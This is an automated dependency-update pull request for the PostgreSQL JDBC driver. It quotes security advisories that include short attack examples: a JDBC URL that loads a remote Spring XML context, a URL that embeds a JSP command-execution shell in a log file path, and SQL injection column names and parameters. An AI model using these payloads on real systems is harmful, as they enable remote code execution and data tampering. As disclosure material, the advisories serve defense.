Update dependency org.postgresql:postgresql to v42.7.11 [SECURITY] (main)

[renovatebot-confluentinc]

For any questions/concerns about this PR, please review the Renovate Bot wiki/FAQs, or the #renovatebot Slack channel.

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
org.postgresql:postgresql (source)	42.7.7 → 42.7.11

---

Warning

Some dependencies could not be looked up. Check the warning logs for more information.

---

pgjdbc Does Not Check Class Instantiation when providing Plugin Classes

CVE-2022-21724 / GHSA-v7wg-cpwc-24m4

More information

Details

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

Severity

• CVSS Score: 7.0 / 10 (High)
• Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
• https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
• https://nvd.nist.gov/vuln/detail/CVE-2022-21724
• https://security.netapp.com/advisory/ntap-20220311-0005/
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/
• https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
• https://www.debian.org/security/2022/dsa-5196
• https://github.com/advisories/GHSA-v7wg-cpwc-24m4

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

pgjdbc Arbitrary File Write Vulnerability

GHSA-673j-qm5f-xpv8

More information

Details

Overview

The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.

It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.

While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.

If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.

Impact

It is possible to specify an arbitrary filename in the loggerFileName connection parameter
"jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter("i"));%>"

This creates a valid JSP file which could lead to a Remote Code Execution

Patches

LoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3

Workarounds

sanitize the inputs to the driver

Reported by Allan Lou v3ged0ge@gmail.com

Severity

Medium

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8
• https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064
• https://github.com/advisories/GHSA-673j-qm5f-xpv8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Path traversal in org.postgresql:postgresql

CVE-2022-26520 / GHSA-727h-hrw8-jg8q

More information

Details

In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties.

Severity

Low

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8
• https://nvd.nist.gov/vuln/detail/CVE-2022-26520
• https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3
• https://jdbc.postgresql.org/documentation/head/tomcat.html
• https://www.debian.org/security/2022/dsa-5196
• https://github.com/pgjdbc/pgjdbc/pull/2454/commits/017b929977b4f85795f9ad2fa5de6e80978b8ccc
• https://github.com/advisories/GHSA-727h-hrw8-jg8q

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

PostgreSQL JDBC Driver SQL Injection in ResultSet.refreshRow() with malicious column names

CVE-2022-31197 / GHSA-r38f-c4h4-hqq2

More information

Details

Impact

What kind of vulnerability is it? Who is impacted?

The PGJDBC implementation of the java.sql.ResultRow.refreshRow() method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. ;, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.

User applications that do not invoke the ResultSet.refreshRow() method are not impacted.

User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the refreshRow() method on the ResultSet.

For example:

CREATE TABLE refresh_row_example (
  id     int PRIMARY KEY,
  "1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * " int
);

This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the ResultSet.refreshRow() on a ResultSet that queried this table, e.g. SELECT * FROM refresh_row, would cause the additional SQL commands such as the SELECT pg_sleep(10) invocation to be executed.

As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the ResultSet.refreshRow() method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.

Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.

Patches

Has the problem been patched? What versions should users upgrade to?

Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

Check that you are not using the ResultSet.refreshRow() method.

If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.

Severity

• CVSS Score: 7.1 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2
• https://nvd.nist.gov/vuln/detail/CVE-2022-31197
• https://github.com/pgjdbc/pgjdbc/commit/739e599d52ad80f8dcd6efedc6157859b1a9d637
• https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html
• https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S
• https://github.com/advisories/GHSA-r38f-c4h4-hqq2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

TemporaryFolder on unix-like systems does not limit access to created files

CVE-2022-41946 / GHSA-562r-vg33-8x8h

More information

Details

Vulnerability

PreparedStatement.setText(int, InputStream)
and

PreparedStatemet.setBytea(int, InputStream)

will create a temporary file if the InputStream is larger than 51k

Example of vulnerable code:

String s = "some very large string greater than 51200 bytes";

PreparedStatement.setInputStream(1, new ByteArrayInputStream(s.getBytes()) );

This will create a temporary file which is readable by other users on Unix like systems, but not MacOS.

Impact
On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system.

This vulnerability does not allow other users to overwrite the contents of these directories or files. This is purely an information disclosure vulnerability.

When analyzing the impact of this vulnerability, here are the important questions to ask:

Is the driver running in an environment where the OS has other untrusted users.
If yes, and you answered 'yes' to question 1, this vulnerability impacts you.
If no, this vulnerability does not impact you.
Patches
Because certain JDK file system APIs were only added in JDK 1.7, this this fix is dependent upon the version of the JDK you are using.

Java 1.8 and higher users: this vulnerability is fixed in 42.2.27, 42.3.8, 42.4.3, 42.5.1
Java 1.7 users: this vulnerability is fixed in 42.2.27.jre7
Java 1.6 and lower users: no patch is available; you must use the workaround below.
Workarounds
If you are unable to patch, or are stuck running on Java 1.6, specifying the java.io.tmpdir system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability.

References
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Fix commit pgjdbc/pgjdbc@9008dc9
Similar Vulnerabilities
Google Guava - https://github.com/google/guava/issues/4011
Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945
JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824

Severity

• CVSS Score: 4.7 / 10 (Medium)
• Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-562r-vg33-8x8h
• https://nvd.nist.gov/vuln/detail/CVE-2022-41946
• https://github.com/pgjdbc/pgjdbc/commit/9008dc9aade6dbfe4efafcd6872ebc55f4699cf5
• https://lists.debian.org/debian-lts-announce/2022/12/msg00003.html
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/25TY2L3RMVNOC7VAHJEAO7PTT6M6JJAD
• https://security.netapp.com/advisory/ntap-20240329-0003
• https://lists.debian.org/debian-lts-announce/2024/12/msg00017.html
• https://github.com/advisories/GHSA-562r-vg33-8x8h

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

org.postgresql:postgresql vulnerable to SQL Injection via line comment generation

CVE-2024-1597 / GHSA-24rp-q3w6-vc56

More information

Details

Impact

SQL injection is possible when using the non-default connection property preferQueryMode=simple in combination with application code that has a vulnerable SQL that negates a parameter value.

There is no vulnerability in the driver when using the default query mode. Users that do not override the query mode are not impacted.

Exploitation

To exploit this behavior the following conditions must be met:

1. A placeholder for a numeric value must be immediately preceded by a minus (i.e. -)
2. There must be a second placeholder for a string value after the first placeholder on the same line.
3. Both parameters must be user controlled.

The prior behavior of the driver when operating in simple query mode would inline the negative value of the first parameter and cause the resulting line to be treated as a -- SQL comment. That would extend to the beginning of the next parameter and cause the quoting of that parameter to be consumed by the comment line. If that string parameter includes a newline, the resulting text would appear unescaped in the resulting SQL.

When operating in the default extended query mode this would not be an issue as the parameter values are sent separately to the server. Only in simple query mode the parameter values are inlined into the executed SQL causing this issue.

Example

PreparedStatement stmt = conn.prepareStatement("SELECT -?, ?");
stmt.setInt(1, -1);
stmt.setString(2, "\nWHERE false --");
ResultSet rs = stmt.executeQuery();

The resulting SQL when operating in simple query mode would be:

SELECT --1,'
WHERE false --'

The contents of the second parameter get injected into the command. Note how both the number of result columns and the WHERE clause of the command have changed. A more elaborate example could execute arbitrary other SQL commands.

Patch

Problem will be patched upgrade to 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, 42.2.28, 42.2.28.jre7

The patch fixes the inlining of parameters by forcing them all to be serialized as wrapped literals. The SQL in the prior example would be transformed into:

SELECT -('-1'::int4), ('
WHERE false --')

Workarounds

Do not use the connection propertypreferQueryMode=simple. (NOTE: If you do not explicitly specify a query mode then you are using the default of extended and are not impacted by this issue.)

Severity

• CVSS Score: 10.0 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56
• https://nvd.nist.gov/vuln/detail/CVE-2024-1597
• https://github.com/pgjdbc/pgjdbc/commit/06abfb78a627277a580d4df825f210e96a4e14ee
• https://github.com/pgjdbc/pgjdbc/commit/93b0fcb2711d9c1e3a2a03134369738a02a58b40
• https://github.com/advisories/GHSA-24rp-q3w6-vc56

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Improper Restriction of XML External Entity Reference

CVE-2020-13692 / GHSA-88cc-g835-76rp

More information

Details

PostgreSQL JDBC Driver (aka PgJDBC) before 42.2.13 allows XXE.

Severity

• CVSS Score: 7.7 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2020-13692
• https://github.com/pgjdbc/pgjdbc/commit/14b62aca4764d496813f55a43d050b017e01eb65
• https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.13
• https://lists.apache.org/thread.html/r00bcc6b2da972e0d6332a4ebc7807e17305d8b8e7fb2ae63d2a3cbfb@%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/r01ae1b3d981cf2e563e9b5b0a6ea54fb3cac8e9a0512ee5269e3420e@%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/r0478a1aa9ae0dbd79d8f7b38d0d93fa933ac232e2b430b6f31a103c0@​%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/r1aae77706aab7d89b4fe19be468fc3c73e9cc84ff79cc2c3bd07c05a@%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/r4bdea189c9991aae7a929d28f575ec46e49ed3d68fa5235825f38a4f@%3Cnotifications.netbeans.apache.org%3E
• https://lists.apache.org/thread.html/r631f967db6260d6178740a3314a35d9421facd8212e62320275fa78e@%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/r7f6d019839df17646ffd0046a99146cacf40492a6c92078f65fd32e0@​%3Ccommits.camel.apache.org%3E
• https://lists.apache.org/thread.html/rb89f92aba44f524d5c270e0c44ca7aec4704691c37fe106cf73ec977@​%3Cnotifications.netbeans.apache.org%3E
• https://lists.apache.org/thread.html/rfe363bf3a46d440ad57fd05c0e313025c7218364bbdc5fd8622ea7ae@%3Ccommits.camel.apache.org%3E
• https://www.debian.org/security/2022/dsa-5196
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCCAPM6FSNOC272DLSNQ6YHXS3OMHGJC
• https://security.netapp.com/advisory/ntap-20200619-0005
• https://github.com/advisories/GHSA-88cc-g835-76rp

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

pgjdbc: Unbounded PBKDF2 iterations in SCRAM authentication allows CPU exhaustion DoS

CVE-2026-42198 / GHSA-98qh-xjc8-98pq

More information

Details

Summary

pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication.

Impact

A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count.
With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail.
A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools.

In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation.

This issue affects availability. It does not provide authentication bypass, privilege escalation, or direct password disclosure.

A user is vulnerable when all of the following are true:

1. The connection uses SCRAM-SHA-256 authentication.
2. The client reaches a malicious, compromised, or attacker-controlled PostgreSQL endpoint.
3. That endpoint sends a very large SCRAM PBKDF2 iteration count in the server-first-message.

In practice, that can happen in these situations:

• the application lets end users or tenants supply their own database connection details (as in many BI, reporting, analytics, ETL, and low-code platforms), so a user can point the shared client host at a server they control
• the application accepts connection strings, hostnames, or JDBC URLs from user input, configuration uploaded by users, or other untrusted sources
• the application is configured to connect to a PostgreSQL server that is itself malicious or later becomes compromised
• the application connects through an untrusted proxy, relay, tunnel, bastion, or connection-pooling service that can act as the PostgreSQL server
• an attacker can redirect the client to a fake PostgreSQL endpoint by manipulating DNS, service discovery, Kubernetes service resolution, /etc/hosts, environment variables, or similar indirection
• an active network attacker on the path can impersonate the server because the connection does not strongly verify server identity (for example, sslmode lower than verify-full, or trusting a CA that signs hosts outside the operator's control)

The issue is more damaging when the application uses connection retries, many parallel connection attempts, or loginTimeout and assumes the timeout fully stops the work.

Patches

The patch introduces a new connection property, scramMaxIterations, with a default of 100K. The client now rejects SCRAM server messages that advertise more PBKDF2 iterations than the configured cap before starting the PBKDF2 computation begins.

Workarounds

Until a patched version of pgjdbc is deployed, the following measures reduce exposure:

1. Only connect to trusted PostgreSQL servers whose identity is verified.
   Connect only to trusted PostgreSQL servers, and verify server identity with TLS using sslmode=verify-full and a trusted CA.
   TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server.

2. Do not rely on loginTimeout as a complete mitigation on unpatched versions.
   On affected versions, loginTimeout can stop the waiting caller while the worker thread continues spending CPU.

3. Avoid SCRAM on untrusted or interceptable connection paths.
   For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count.

4. Reduce blast radius operationally.
   Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate.

5. On trusted servers you control, keep SCRAM iteration counts at ordinary values.
   This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq
• https://nvd.nist.gov/vuln/detail/CVE-2026-42198
• https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11
• https://github.com/advisories/GHSA-98qh-xjc8-98pq

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

pgjdbc: Unbounded PBKDF2 iterations in SCRAM authentication allows CPU exhaustion DoS

BIT-postgresql-jdbc-driver-2026-42198 / CVE-2026-42198 / GHSA-98qh-xjc8-98pq

More information

Details

Summary

pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication.

Impact

A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count.
With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail.
A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools.

In affected versions, loginTimeout did not fully mitigate this problem. When loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation.

This issue affects availability. It does not provide authentication bypass, privilege escalation, or direct password disclosure.

A user is vulnerable when all of the following are true:

1. The connection uses SCRAM-SHA-256 authentication.
2. The client reaches a malicious, compromised, or attacker-controlled PostgreSQL endpoint.
3. That endpoint sends a very large SCRAM PBKDF2 iteration count in the server-first-message.

In practice, that can happen in these situations:

• the application lets end users or tenants supply their own database connection details (as in many BI, reporting, analytics, ETL, and low-code platforms), so a user can point the shared client host at a server they control
• the application accepts connection strings, hostnames, or JDBC URLs from user input, configuration uploaded by users, or other untrusted sources
• the application is configured to connect to a PostgreSQL server that is itself malicious or later becomes compromised
• the application connects through an untrusted proxy, relay, tunnel, bastion, or connection-pooling service that can act as the PostgreSQL server
• an attacker can redirect the client to a fake PostgreSQL endpoint by manipulating DNS, service discovery, Kubernetes service resolution, /etc/hosts, environment variables, or similar indirection
• an active network attacker on the path can impersonate the server because the connection does not strongly verify server identity (for example, sslmode lower than verify-full, or trusting a CA that signs hosts outside the operator's control)

The issue is more damaging when the application uses connection retries, many parallel connection attempts, or loginTimeout and assumes the timeout fully stops the work.

Patches

The patch introduces a new connection property, scramMaxIterations, with a default of 100K. The client now rejects SCRAM server messages that advertise more PBKDF2 iterations than the configured cap before starting the PBKDF2 computation begins.

Workarounds

Until a patched version of pgjdbc is deployed, the following measures reduce exposure:

1. Only connect to trusted PostgreSQL servers whose identity is verified.
   Connect only to trusted PostgreSQL servers, and verify server identity with TLS using sslmode=verify-full and a trusted CA.
   TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server.

2. Do not rely on loginTimeout as a complete mitigation on unpatched versions.
   On affected versions, loginTimeout can stop the waiting caller while the worker thread continues spending CPU.

3. Avoid SCRAM on untrusted or interceptable connection paths.
   For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count.

4. Reduce blast radius operationally.
   Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate.

5. On trusted servers you control, keep SCRAM iteration counts at ordinary values.
   This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq
• https://nvd.nist.gov/vuln/detail/CVE-2026-42198
• https://github.com/pgjdbc/pgjdbc
• https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate.

[service-bot-app]

Could not automerge PR: CI checks have not passed